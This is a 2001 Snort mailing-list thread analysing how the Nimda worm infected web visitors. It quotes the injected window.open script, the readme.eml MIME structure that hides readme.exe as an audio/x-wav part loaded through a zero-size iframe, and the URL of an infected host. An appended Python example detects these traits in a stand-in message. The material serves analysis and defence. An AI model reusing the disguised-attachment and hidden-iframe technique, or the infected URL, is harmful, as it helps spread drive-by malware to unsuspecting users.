Snort mailing list archives
Re: nimda
From: "Sean Wheeler" <S.Wheeler () netprotect ch>
Date: Wed, 19 Sep 2001 13:46:08 +0200
Figuring out how this is happening:

A user noticed this same effect while browsing the net. I jumped on a unix box and tried to figure out what was happening.

First downloaded the main html page:

    wget xxx.xxx.xxx.xxx

The bottom of the index.html reads:

    <script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script>

Grabbed the readme.eml:

    wget xxx.xxx.xxx/readme.eml

and there she sits, the readme.exe inside the readme.eml. It seems the *.eml extension is associated with Outlook, and thus the readme.eml is processed by Outlook when the javascript is executed and the infection occurs just as if you had received it via e-mail.

Below is the first portion of the readme.eml file:

    MIME-Version: 1.0
    Content-Type: multipart/related; type="multipart/alternative";
            boundary="====_ABC1234567890DEF_===="
    X-Priority: 3
    X-MSMail-Priority: Normal
    X-Unsent: 1

    --====_ABC1234567890DEF_====
    Content-Type: multipart/alternative; boundary="====_ABC0987654321DEF_===="

    --====_ABC0987654321DEF_====
    Content-Type: text/html; charset="iso-8859-1"
    Content-Transfer-Encoding: quoted-printable

    <HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
    <iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0> </iframe></BODY></HTML>

    --====_ABC0987654321DEF_====--

    --====_ABC1234567890DEF_====
    Content-Type: audio/x-wav; name="readme.exe"
    Content-Transfer-Encoding: base64
    Content-ID: <EA4DMGBP9p>

    TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
    etc etc etc.......................

Pretty scary stuff !!

If this has been covered already sorry for the repetition, just got back from the chaos of international airports, have not got through all the mail yet.

Sean

----- Original Message -----
From: Olensky, Sven
To: snort-users () lists sourceforge net
Sent: Tuesday, September 18, 2001 7:13 PM
Subject: [Snort-users] nimda

check this out
http://208.193.197.48/
that's one of the source IPs.
opens a second window, offers readme.exe as download. jesus.

-----Original Message-----
From: snortlst snortlst [mailto:snortlst () hotmail com]
Sent: Tuesday, September 18, 2001 12:13 PM
To: snort-users () lists sourceforge net
Subject: [Snort-users] General info

I couldn't find the explanation for pretty simple questions on the snort site, so maybe you can clarify this:

1. When you compare traffic to the rules what are the options - alerts are sent to syslog or database, or file, that's o.k., but can you for example drop connection if it conflicts with snort rules? What else can you do to malicious connections?
2. I don't think mysql is an option for me, is ACID simpler to configure than mysql?
3. Can I generate HTML reports if I log to ACID?
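The readme.eml layout Sean quotes above, as an added example that is not part of the thread: a small Python audit that parses such a message with the standard library and flags the two things the sample relies on, an HTML part that auto-loads a cid: part in a hidden iframe, and a part declared audio/x-wav whose decoded body is really a PE executable (MZ header). The sample message is constructed to mirror the quoted headers and nesting; its base64 body is a stand-in with only an MZ header, and the audit_eml function and its finding strings are assumptions of this example.

```python
import base64
import email
import re
from email import policy

# Constructed sample mirroring the readme.eml layout quoted in the thread: same
# headers and nesting, but the base64 body is a stand-in with a bare PE "MZ" header.
FAKE_PE = b"MZ\x90\x00" + b"\x00" * 60 + b"This program cannot be run in DOS mode"
README_EML = (
    "MIME-Version: 1.0\r\n"
    'Content-Type: multipart/related; type="multipart/alternative"; '
    'boundary="====_ABC1234567890DEF_===="\r\n'
    "X-Unsent: 1\r\n\r\n"
    "--====_ABC1234567890DEF_====\r\n"
    'Content-Type: multipart/alternative; boundary="====_ABC0987654321DEF_===="\r\n\r\n'
    "--====_ABC0987654321DEF_====\r\n"
    'Content-Type: text/html; charset="iso-8859-1"\r\n'
    "Content-Transfer-Encoding: quoted-printable\r\n\r\n"
    "<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>\r\n"
    "<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0> </iframe></BODY></HTML>\r\n"
    "--====_ABC0987654321DEF_====--\r\n"
    "--====_ABC1234567890DEF_====\r\n"
    'Content-Type: audio/x-wav; name="readme.exe"\r\n'
    "Content-Transfer-Encoding: base64\r\n"
    "Content-ID: <EA4DMGBP9p>\r\n\r\n"
    + base64.b64encode(FAKE_PE).decode() + "\r\n"
    "--====_ABC1234567890DEF_====--\r\n"
)

IFRAME_CID = re.compile(r"<iframe[^>]*\bsrc=[\"']?cid:([^\"'\s>]+)", re.I)

def audit_eml(raw: str) -> list[str]:
    """Return findings for: an HTML part auto-loading a cid: part in an iframe, and a
    part whose declared type does not match its real content (PE body, .exe name)."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings, auto_loaded = [], set()
    # Pass 1: which Content-IDs does the HTML body pull in without any click?
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            for cid in IFRAME_CID.findall(part.get_content()):  # QP already decoded
                auto_loaded.add(cid)
                findings.append(f"html part loads cid:{cid} in an iframe")
    # Pass 2: compare each leaf part's decoded body with what its headers claim.
    for part in msg.walk():
        if part.is_multipart() or part.get_content_type() == "text/html":
            continue
        body = part.get_payload(decode=True) or b""
        name = part.get_filename() or "(unnamed)"
        cid = (part.get("Content-ID") or "").strip("<>")
        if body.startswith(b"MZ") and not part.get_content_type().endswith("dosexec"):
            findings.append(f"{name}: declared {part.get_content_type()} but body is a PE (MZ)")
        if name.lower().endswith(".exe"):
            findings.append(f"{name}: executable filename")
        if cid and cid in auto_loaded:
            findings.append(f"{name}: is the auto-loaded iframe target cid:{cid}")
    return findings
```

Running audit_eml(README_EML) reports the hidden iframe, the audio/x-wav part that is really a PE, its .exe name, and that this part is the iframe's target; a plain text/plain message yields no findings.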
Current thread:
- nimda Olensky, Sven (Sep 18)
- Re: nimda Sean Wheeler (Sep 19)